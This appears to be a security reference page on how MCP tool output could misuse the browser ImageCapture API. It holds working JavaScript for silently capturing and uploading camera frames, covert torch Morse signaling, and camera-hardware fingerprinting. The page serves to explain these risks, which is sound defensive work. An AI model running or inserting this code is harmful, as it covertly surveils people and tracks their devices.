MCP Server Security · ImageCapture API · grabFrame · takePhoto · MediaStream · Camera Abuse · Photo Capture · Torch Control · Pan Tilt Zoom

MCP server ImageCapture API security

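The ImageCapture API extends a camera MediaStreamTrack with silent frame grabbing and still-photo capture, and the same track exposes hardware camera controls such as torch/flash, zoom, pan, and tilt. ImageCapture and torch control need no permission beyond the original camera grant; in Chromium, only pan, tilt, and zoom are gated by a separate camera PTZ permission that the page must have requested up front. MCP tool output that runs with access to a MediaStreamTrack (from any getUserMedia() grant) can therefore call grabFrame() to capture frames continuously, switch on the torch, and, where the page already holds PTZ access, adjust zoom, all without triggering a new permission dialog.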

ImageCapture API surface

// ImageCapture API: Chromium browsers (Chrome 59+, Edge 79+); Firefox only behind a pref; not in Safari
// Requires an existing live video MediaStreamTrack; constructing ImageCapture shows no prompt

// Obtain a camera track (the only permission dialog is for the track itself)
const stream = await navigator.mediaDevices.getUserMedia({ video: true });
const [videoTrack] = stream.getVideoTracks();

// Create an ImageCapture instance bound to the track: no additional permission
const capture = new ImageCapture(videoTrack);

// Grab the current video frame as an ImageBitmap: no shutter sound, no indicator change
const imageBitmap = await capture.grabFrame();
// Returns: ImageBitmap at the track's current video resolution

// Take a still photo as a Blob; may trigger a shutter sound or flash on some devices
const photoBlob = await capture.takePhoto({ imageHeight: 2160, imageWidth: 3840 });
// Returns: Blob (typically JPEG)

// Query still-photo capabilities (photo parameters only, no permission)
const photoCaps = await capture.getPhotoCapabilities();
// Returns a PhotoCapabilities object, e.g.:
//   redEyeReduction: 'never' | 'always' | 'controllable'
//   imageHeight:     { min: 480, max: 2160, step: 1 }
//   imageWidth:      { min: 640, max: 3840, step: 1 }
//   fillLightMode:   ['auto', 'off', 'flash']

// Hardware controls are exposed as track capabilities, not on ImageCapture
const trackCaps = videoTrack.getCapabilities();
// e.g. zoom:      { min: 1, max: 8, step: 0.1 }
//      pan, tilt: { min, max, step } on PTZ cameras (spec units: arc-seconds)
//      torch:     true when the camera has a controllable flash LED

// Read current settings
const photoSettings = await capture.getPhotoSettings();
// e.g. { fillLightMode: 'off', imageHeight: 1080, imageWidth: 1920, redEyeReduction: false }
const trackSettings = videoTrack.getSettings();
// e.g. { width: 1920, height: 1080, zoom: 1, torch: false, ... }

// Apply hardware controls via track constraints; each takes effect immediately
await videoTrack.applyConstraints({ advanced: [{ torch: true }] });       // flash LED on (physical light!), no extra prompt
await videoTrack.applyConstraints({ advanced: [{ zoom: 4 }] });           // 4x zoom (Chromium: needs PTZ permission)
await videoTrack.applyConstraints({ advanced: [{ pan: 45 * 3600 }] });    // pan PTZ camera 45° right (PTZ permission)
await videoTrack.applyConstraints({ advanced: [{ tilt: -20 * 3600 }] });  // tilt PTZ camera 20° down (PTZ permission)

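No second permission prompt: ImageCapture is constructed from an existing video MediaStreamTrack. Once the user has granted camera access (for a video call, QR scanner, document scanner, or any other purpose), grabFrame(), takePhoto(), getPhotoCapabilities(), and torch control through applyConstraints() are all available without any additional dialog. Pan, tilt, and zoom are the exception in Chromium: they require the separate camera PTZ permission, which a page requests by including pan, tilt, or zoom in its getUserMedia() video constraints, so injected code can use them only when the page already asked for them. The user sees only the camera indicator light that was already active from the original stream.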
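Assuming Chromium's PTZ model (pan, tilt, and zoom need a separate permission that is requested through getUserMedia() constraints), a reviewer can estimate which camera controls an injected script would inherit just from the constraints the page used. The sketch below is illustrative: inheritedCameraControls() is a hypothetical helper, not a browser API, and it only inspects top-level constraint keys.

```javascript
// Hypothetical audit helper (not a browser API): given the constraints a page
// passed to getUserMedia(), report which camera controls a script that later
// reaches the resulting video track could use without a new prompt.
// Assumes Chromium's model: pan/tilt/zoom need the camera PTZ permission, which
// is requested only when those keys appear (top level) in the video constraints.
function inheritedCameraControls(constraints) {
  const video = constraints ? constraints.video : undefined;
  if (!video) {
    return { camera: false, grabFrame: false, torch: false, ptz: [] };
  }
  const ptz = typeof video === 'object'
    ? ['pan', 'tilt', 'zoom'].filter((key) => video[key] !== undefined && video[key] !== false)
    : []; // `video: true` asks for the camera only, not PTZ
  return {
    camera: true,
    grabFrame: true, // any live video track can back an ImageCapture
    torch: true,     // no extra prompt; still requires a device with a controllable LED
    ptz,
  };
}
```

For example, a conferencing page that opened the camera with { video: { pan: true, tilt: true, zoom: true } } hands all three PTZ controls to any script that reaches its track, while a QR scanner that used { video: true } hands over frames and torch but not PTZ.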

Attack 1 — Silent continuous frame capture loop

If an MCP tool has access to a MediaStreamTrack (from a video call page, a QR code scanner, a document upload page with camera access, or any prior getUserMedia() grant), it can call grabFrame() repeatedly, up to the track's frame rate. Unlike takePhoto(), which can trigger a shutter sound or flash on some devices, grabFrame() just returns the next video frame: it plays no sound and causes no visible change in the camera indicator. Each call returns an ImageBitmap at the current video resolution. Drawing the bitmap to an offscreen canvas and calling toDataURL() or toBlob() produces a transmittable image. A 1 frame/second loop over a one-hour video call silently captures 3,600 still images.
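The capture volume in that estimate is simple arithmetic, and the same calculation gives a rough upload budget. A minimal sketch: captureVolume() is a hypothetical helper, and avgFrameBytes is an input the caller must supply, because real JPEG sizes depend on resolution, scene content, and the quality passed to toBlob().

```javascript
// Hypothetical helper: frames captured and approximate bytes uploaded for a
// capture loop running at `fps` for `durationSeconds`.
// avgFrameBytes is an assumed per-frame JPEG size supplied by the caller.
function captureVolume(fps, durationSeconds, avgFrameBytes) {
  if (fps <= 0 || durationSeconds <= 0) return { frames: 0, approxBytes: 0 };
  const frames = Math.floor(fps * durationSeconds); // one grabFrame() per interval
  return { frames, approxBytes: frames * avgFrameBytes };
}
```

For instance, captureVolume(1, 3600, 150000) gives 3,600 frames and 540,000,000 bytes (about 540 MB) if each frame were 150 KB; the 150 KB figure is only an illustrative assumption. Treat the frame count as an upper bound, since a loop that waits for each grabFrame() to resolve can fall behind its nominal rate.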

// Attack: continuous silent frame capture from any existing MediaStreamTrack
// No new permission dialog, no shutter sound, no camera indicator change

class SilentCameraCapture {
  constructor(videoTrack, fps = 1) {
    this.capture  = new ImageCapture(videoTrack);
    this.interval = 1000 / fps;  // milliseconds between frames
    this.canvas   = document.createElement('canvas');
    this.ctx      = this.canvas.getContext('2d');
    this.running  = false;
    this.queue    = [];
  }

  async start() {
    this.running = true;
    while (this.running) {
      const t0 = performance.now();
      try {
        // grabFrame(): no shutter sound, no indicator pulse, no permission
        const bitmap = await this.capture.grabFrame();

        this.canvas.width  = bitmap.width;
        this.canvas.height = bitmap.height;
        this.ctx.drawImage(bitmap, 0, 0);
        bitmap.close();

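        // Encode as JPEG at 80% quality for bandwidth-efficient exfiltration
        this.canvas.toBlob(blob => {
          if (!blob) return;  // toBlob passes null if encoding fails
          this.queue.push({ blob, timestamp: Date.now() });
          if (this.queue.length >= 10) {
            this.flush().catch(() => {});  // on network error the batch is dropped
          }
        }, 'image/jpeg', 0.8);

      } catch (e) {
        // grabFrame() rejects with InvalidStateError once the track has ended
        // (e.g. the video call was closed), so stop capturing
        if (e.name === 'InvalidStateError') { this.stop(); break; }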
      }

      // Wait for remainder of interval
      const elapsed = performance.now() - t0;
      await new Promise(r => setTimeout(r, Math.max(0, this.interval - elapsed)));
    }
  }

  async flush() {
    const batch = this.queue.splice(0);
    const form  = new FormData();
    batch.forEach((item, i) => {
      form.append(`frame_${i}`, item.blob, `${item.timestamp}.jpg`);
    });
    await fetch('/api/frames', { method: 'POST', body: form });
  }

  stop() { this.running = false; }
}

// Usage: attach to any existing MediaStreamTrack from video call / QR scanner
// const capturer = new SilentCameraCapture(videoTrack, 2);  // 2 fps
// capturer.start();
// → 7,200 frames captured silently during a 1-hour video call

Attack 2 — Torch/flash LED activation and covert signaling

Applying the torch constraint (videoTrack.applyConstraints({ advanced: [{ torch: true }] })) immediately switches on the camera's flash LED. On a smartphone this is the same LED used as a flashlight, so it is highly visible. Browsers mostly expose torch on phone rear cameras; whether other light sources, such as the IR illuminator on a Windows Hello laptop camera or the lights of a PTZ security camera managed through a browser interface, are reachable through this constraint depends on the platform and the camera driver. Beyond the obvious privacy violation of an unexpected flash, the torch can be weaponized as a covert out-of-band signaling channel: an MCP tool can encode data as a sequence of torch on/off pulses (Morse code, Manchester encoding) at rates a nearby physical observer or camera can detect and record.
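The bandwidth of that channel follows directly from standard Morse timing: a dit is one unit, a dah three, the gap inside a character one, between characters three, and between words seven; under the PARIS convention one unit lasts 1200 / WPM milliseconds. The sketch below computes the on/off schedule for a message without touching any camera API. morseSchedule(), totalMs(), and the four-letter code table are illustrative assumptions, not part of any library.

```javascript
// Illustrative subset of International Morse code (enough for the examples).
const MORSE_SUBSET = { e: '.', t: '-', s: '...', o: '---' };

// PARIS convention: one unit in milliseconds = 1200 / words-per-minute.
function unitMs(wpm) {
  return 1200 / wpm;
}

// Build an ordered list of ['on' | 'off', durationMs] segments for `message`.
// Characters missing from the table are skipped; runs of whitespace separate words.
function morseSchedule(message, wpm) {
  const u = unitMs(wpm);
  const words = message
    .toLowerCase()
    .split(/\s+/)
    .map((word) => [...word].map((ch) => MORSE_SUBSET[ch]).filter(Boolean))
    .filter((codes) => codes.length > 0);

  const segments = [];
  words.forEach((codes, wi) => {
    if (wi > 0) segments.push(['off', 7 * u]); // gap between words
    codes.forEach((code, ci) => {
      if (ci > 0) segments.push(['off', 3 * u]); // gap between characters
      [...code].forEach((symbol, si) => {
        if (si > 0) segments.push(['off', 1 * u]); // gap between symbols
        segments.push(['on', (symbol === '.' ? 1 : 3) * u]); // dit or dah
      });
    });
  });
  return segments;
}

// Total transmission time of a schedule, in milliseconds.
function totalMs(segments) {
  return segments.reduce((sum, [, ms]) => sum + ms, 0);
}
```

At 12 WPM a unit is 100 ms, so morseSchedule('SOS', 12) yields 17 segments totalling 2,700 ms (27 units); at 10 WPM a unit is 120 ms. Each on/off transition on a real device also costs a constraint round trip, so the achievable rate is likely somewhat lower than the nominal WPM; that latency is not modeled here.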

// Attack 2a: unexpected flash activation in meeting context
async function activateTorch(videoTrack) {
  // Torch support is reported by the track's capabilities, not by getPhotoCapabilities()
  const caps = videoTrack.getCapabilities();

  if (!caps.torch) {
    return { error: 'no torch hardware' };
  }

  // Activate torch immediately: no warning, no permission prompt
  await videoTrack.applyConstraints({ advanced: [{ torch: true }] });
  // Physical LED is now on, visible to anyone near the device

  return { torchActive: true };
}

// Attack 2b: Morse code signaling via torch LED
// Encodes a string as on/off torch pulses at 10 WPM
// A nearby observer or camera can record and decode the signal out-of-band

const MORSE = {
  a:'.-', b:'-...', c:'-.-.', d:'-..', e:'.', f:'..-.',
  g:'--.', h:'....', i:'..', j:'.---', k:'-.-', l:'.-..',
  m:'--', n:'-.', o:'---', p:'.--.', q:'--.-', r:'.-.',
  s:'...', t:'-', u:'..-', v:'...-', w:'.--', x:'-..-',
  y:'-.--', z:'--..',
  '0':'-----','1':'.----','2':'..---','3':'...--','4':'....-',
  '5':'.....','6':'-....','7':'--...','8':'---..','9':'----.'
};
const DIT = 120;  // 120 ms unit = 10 WPM under PARIS timing (1200 / 10)

async function morseSignal(videoTrack, message) {
  if (!videoTrack.getCapabilities().torch) return;

  const setTorch = (state) => videoTrack.applyConstraints({ advanced: [{ torch: state }] });
  const wait     = (ms) => new Promise(r => setTimeout(r, ms));
  const on  = (ms) => setTorch(true).then(() => wait(ms));
  const off = (ms) => setTorch(false).then(() => wait(ms));

  for (const char of message.toLowerCase()) {
    if (char === ' ') { await off(DIT * 4); continue; }  // word gap: 3 (char gap) + 4 = 7 units
    const code = MORSE[char];
    if (!code) continue;                                  // skip unsupported characters
    for (const symbol of code) {
      if (symbol === '.') { await on(DIT);     await off(DIT); }  // dit + 1-unit symbol gap
      if (symbol === '-') { await on(DIT * 3); await off(DIT); }  // dah + 1-unit symbol gap
    }
    await off(DIT * 2);  // character gap: 1 (symbol gap) + 2 = 3 units
  }
  await setTorch(false);
}

// morseSignal(videoTrack, 'SOS');
// → physical flash LED pulses ··· --- ··· (SOS) on the device
// → detectable by any camera or observer within line of sight

Torch activation is physically visible: the torch constraint turns on the same LED used as a flashlight. On a phone in a meeting or call where the rear camera is active, this produces an unexpected bright light visible to everyone nearby. If a platform exposed an infrared illuminator (such as a Windows Hello IR camera's) through the same control, the light would be invisible to people but detectable by IR-sensitive cameras; whether any browser does so depends on the hardware and driver. There is no browser permission prompt or user warning for torch control.

Attack 3 — Zoom and camera capability fingerprinting via getCapabilities() and getPhotoCapabilities()

Reading camera capabilities changes no camera state: videoTrack.getCapabilities() and capture.getPhotoCapabilities() are read-only calls that leave no trace. The zoom range (min, max, step) is reported by the track, while the maximum photo resolution (imageWidth/imageHeight), fill-light modes, and red-eye support come from getPhotoCapabilities(); all of these are determined by the camera module and the platform camera stack, not by the page. Devices differ measurably here: a flagship with a long telephoto range, such as a Samsung Galaxy S24 Ultra or Google Pixel 8 Pro, may expose a much larger zoom maximum than a budget Android phone, which can report a maximum around 2.0 with coarse steps, and a desktop webcam usually reports no torch at all. The figures a browser reports are not the same as the marketing optical-zoom numbers, and iPhones are out of scope entirely because Safari and the other WebKit-based iOS browsers do not implement ImageCapture. Combined, the zoom profile, maximum photo resolution, and torch presence form a multi-dimensional fingerprint that can narrow down the camera hardware model more precisely than the reduced navigator.userAgent string.
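One way to turn such a profile into a compact identifier that can link visits is to serialize the fields in a fixed order and hash the result. A sketch under stated assumptions: the flat field names (zoomMin, zoomMax, zoomStep, maxWidth, maxHeight, torch, fillLightModes) are hypothetical, and 32-bit FNV-1a is used only because it is short and dependency-free; any stable hash would serve.

```javascript
// Serialize a flat capability profile in a fixed field order.
// Missing values become '-' so absent capabilities still contribute to the ID.
function canonicalProfile(p) {
  return [
    p.zoomMin, p.zoomMax, p.zoomStep,
    p.maxWidth, p.maxHeight,
    p.torch ? 1 : 0,
    (p.fillLightModes || []).slice().sort().join('+'), // order-independent
  ].map((v) => (v === undefined || v === null ? '-' : String(v))).join('|');
}

// 32-bit FNV-1a over UTF-16 code units, returned as 8 hex digits.
function fnv1a32(str) {
  let h = 0x811c9dc5; // FNV offset basis
  for (let i = 0; i < str.length; i++) {
    h ^= str.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0; // multiply by FNV prime mod 2^32
  }
  return h.toString(16).padStart(8, '0');
}

const cameraFingerprint = (p) => fnv1a32(canonicalProfile(p));
```

Because the fields are serialized in a fixed order and the fill-light list is sorted, two reads from the same camera produce the same identifier even if the browser returns the modes in a different order.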

// Attack: read camera capabilities to fingerprint camera hardware model
// No state change: purely read operations, no shutter, no indicator change

async function fingerprintCameraHardware(videoTrack) {
  const capture = new ImageCapture(videoTrack);

  // Both calls are read-only: no side effects, no permission prompt
  const trackCaps = videoTrack.getCapabilities();          // zoom, pan, tilt, torch
  const photoCaps = await capture.getPhotoCapabilities();  // photo size, fill light, red-eye

  const profile = {
    zoom: {
      min:  trackCaps.zoom?.min,   // e.g., 1.0
      max:  trackCaps.zoom?.max,   // large on long-telephoto flagships, ~2.0 on budget devices
      step: trackCaps.zoom?.step   // e.g., 0.1 (fine) vs 1.0 (coarse)
    },
    resolution: {
      maxWidth:  photoCaps.imageWidth?.max,   // e.g., 4032 (12MP), 8064 (~48MP), 1920 (webcam)
      maxHeight: photoCaps.imageHeight?.max,
    },
    torch:           Boolean(trackCaps.torch),   // true = device with controllable flash LED
    fillLightModes:  photoCaps.fillLightMode,    // subset of ['auto', 'off', 'flash']
    redEyeReduction: photoCaps.redEyeReduction,  // 'controllable' on advanced modules
  };

  // Heuristic device classes (illustrative thresholds, not measured data):
  // zoom.max >= 10                → flagship with long telephoto range
  // zoom.max >= 5                 → multi-camera flagship
  // zoom.max >= 3 && torch        → standard phone with some zoom headroom
  // zoom.max <= 2 && step >= 1.0  → budget Android or front-facing camera
  // resolution.maxWidth >= 8000   → 48MP+ sensor
  // !torch && maxWidth <= 1920    → laptop webcam (no torch, often fixed-focus)
  // !torch && maxWidth >= 3840    → 4K webcam (e.g., Logitech BRIO-class USB cameras)

  const deviceClass =
    profile.zoom.max >= 10 ? 'flagship_ultra_telephoto' :
    profile.zoom.max >= 5  ? 'flagship_pro_multiCamera'  :
    profile.zoom.max >= 3  ? 'flagship_standard'         :
    !profile.torch         ? 'laptop_webcam'             :
                             'midrange_android';

  await fetch('/api/camera-fingerprint', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ profile, deviceClass, trackLabel: videoTrack.label })
  });

  return { profile, deviceClass };
}

// videoTrack.label also reveals the camera model name:
// "FaceTime HD Camera" → MacBook
// "Logitech BRIO"      → desktop webcam model
// "camera2 0, facing back" → Android rear camera (generic label)
// "Integrated Camera"  → Windows laptop (generic but narrows to PC)
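The label examples above can be turned into a coarse lookup. labelHint() and its pattern table are hypothetical and cover only those four example labels; real labels vary by operating system, driver, and browser, so the result is a hint rather than an identification.

```javascript
// Hypothetical pattern table derived from the example labels above.
// Order matters: the first matching pattern wins.
const LABEL_HINTS = [
  [/facetime/i, 'apple_mac_builtin'],
  [/^camera2 \d+, facing (front|back)/i, 'android_camera2'],
  [/integrated camera/i, 'windows_laptop_builtin'],
  [/logitech/i, 'logitech_usb_webcam'],
];

// Map a MediaStreamTrack.label string to a coarse device hint.
function labelHint(label) {
  for (const [pattern, hint] of LABEL_HINTS) {
    if (pattern.test(label)) return hint;
  }
  return 'unknown';
}
```

In practice such a hint would be combined with the capability profile rather than used alone, since generic labels like "Integrated Camera" only narrow the device to a broad class.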